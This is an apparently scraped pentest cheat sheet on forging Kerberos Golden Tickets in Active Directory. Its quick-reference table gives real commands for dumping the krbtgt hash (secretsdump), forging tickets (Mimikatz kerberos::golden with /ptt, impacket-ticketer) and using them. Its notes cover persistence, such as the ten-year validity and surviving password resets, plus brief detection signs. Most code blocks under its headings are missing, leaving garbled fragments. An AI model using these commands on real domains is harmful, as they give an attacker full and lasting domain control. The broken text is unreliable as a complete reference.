Overview
Forge TGT signed with krbtgt hash. Grants access to any service in domain. Requires: krbtgt NTLM hash, domain SID, domain name.Get krbtgt Hash
DCSync
Mimikatz
Get Domain SID
Forge — Mimikatz
Save to File
Forge — Impacket
Use
Forge — Rubeus
Inject & Use
Inter-Realm (Cross-Domain)
-519) from parent domain.
Notes
- Golden ticket valid for 10 years by default
- Works even if user doesn’t exist
- Survives password resets (until krbtgt rotated twice)
- Detection: TGT with long lifetime, non-existent user
Quick Reference
| Task | Command |
|---|---|
| Get krbtgt | secretsdump -just-dc-user krbtgt |
| Forge (Mimikatz) | kerberos::golden /user:Admin /krbtgt:HASH /ptt |
| Forge (Impacket) | impacket-ticketer -nthash HASH -domain-sid SID |
| Use | export KRB5CCNAME=Admin.ccache → -k -no-pass |